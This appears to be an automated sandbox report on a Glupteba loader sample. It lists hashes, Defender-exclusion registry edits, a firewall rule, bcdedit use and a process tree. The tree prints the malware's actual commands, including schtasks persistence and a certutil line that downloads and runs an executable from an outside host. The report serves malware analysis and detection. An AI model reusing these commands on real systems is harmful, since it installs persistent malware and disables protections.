General
Target     bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
Filesize   3MB
Completed  20-05-2022 22:25
Task       behavioral1
Score      10/10
MD5        7da8b9fc5c5a67a06afc0749473f1b6e
SHA1       7b0c1138015a3a573469e1142e44be65b73979c5
SHA256     bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7
SHA512     5b9a364aa7cdf6340e709afb5a60eabd045ace1eaeefaa23fd89ede50bd0a51329d69a4afd49ca270ebb80014882ef7728cf72a362a1d0a63d01ba66fa244df7

Malware Config
Signatures 16

Tactics: Defense Evasion, Discovery, Persistence
  • Glupteba

    Description

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload

    Reported IOCs

    resource | yara_rule
    behavioral1/memory/1448-56-0x00000000053B0000-0x0000000005AA6000-memory.dmp | family_glupteba
    behavioral1/memory/1448-57-0x0000000000400000-0x00000000036C8000-memory.dmp | family_glupteba
    behavioral1/memory/1388-63-0x0000000000400000-0x00000000036C8000-memory.dmp | family_glupteba
    behavioral1/memory/868-70-0x0000000000400000-0x00000000036C8000-memory.dmp | family_glupteba
  • Windows security bypass

    TTPs

    Disabling Security Tools, Modify Registry
  • Executes dropped EXE
    csrss.exe, patch.exe

    Reported IOCs

    pid  | process
    868  | csrss.exe
    1008 | patch.exe
    1276 |
  • Modifies Windows Firewall

    TTPs

    Modify Existing Service
  • Loads dropped DLL
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe, patch.exe

    Reported IOCs

    pid  | process
    1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    880  |
    1008 | patch.exe
    1008 | patch.exe
    1008 | patch.exe
    1008 | patch.exe
    1008 | patch.exe
    1276 |
    1008 | patch.exe
    1008 | patch.exe
    1008 | patch.exe
  • Windows security modification
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe

    TTPs

    Disabling Security Tools, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d26671056783.exe = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\d26671056783 = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\WanderingSun = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Adds Run key to start application
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\WanderingSun = "\"C:\\Windows\\rss\\csrss.exe\"" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    TTPs

    Query Registry
  • Modifies boot configuration data using bcdedit
    bcdedit.exe

    Reported IOCs

    pid  | process
    1292 | bcdedit.exe
  • Drops file in Windows directory
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe, makecab.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Windows\rss\csrss.exe | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    File created | C:\Windows\Logs\CBS\CbsPersist_20220521002317.cab | makecab.exe
    File opened for modification | C:\Windows\rss | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Creates scheduled task(s)
    schtasks.exe, schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid  | process
    1504 | schtasks.exe
    572  | schtasks.exe
  • Modifies data under HKEY_USERS
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe, netsh.exe

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | netsh.exe
    Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | netsh.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Suspicious behavior: EnumeratesProcesses
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe, bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe

    Reported IOCs

    pid  | process
    1448 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Suspicious use of AdjustPrivilegeToken
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe, csrss.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1448 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Token: SeImpersonatePrivilege | 1448 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Token: SeSystemEnvironmentPrivilege | 868 | csrss.exe
  • Suspicious use of WriteProcessMemory
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe, cmd.exe, csrss.exe

    Reported IOCs

    description | pid | process | target process
    PID 1388 wrote to memory of 1652 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | cmd.exe
    PID 1388 wrote to memory of 1652 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | cmd.exe
    PID 1388 wrote to memory of 1652 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | cmd.exe
    PID 1388 wrote to memory of 1652 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | cmd.exe
    PID 1652 wrote to memory of 1856 | 1652 | cmd.exe | netsh.exe
    PID 1652 wrote to memory of 1856 | 1652 | cmd.exe | netsh.exe
    PID 1652 wrote to memory of 1856 | 1652 | cmd.exe | netsh.exe
    PID 1388 wrote to memory of 868 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | csrss.exe
    PID 1388 wrote to memory of 868 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | csrss.exe
    PID 1388 wrote to memory of 868 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | csrss.exe
    PID 1388 wrote to memory of 868 | 1388 | bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe | csrss.exe
    PID 868 wrote to memory of 1292 | 868 | csrss.exe | bcdedit.exe
    PID 868 wrote to memory of 1292 | 868 | csrss.exe | bcdedit.exe
    PID 868 wrote to memory of 1292 | 868 | csrss.exe | bcdedit.exe
    PID 868 wrote to memory of 1292 | 868 | csrss.exe | bcdedit.exe
Processes 10
  • C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    "C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe"
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    PID:1448
    • C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
      "C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe"
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes"
        Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes
          Modifies data under HKEY_USERS
          PID:1856
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          Creates scheduled task(s)
          PID:572
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          Creates scheduled task(s)
          PID:1504
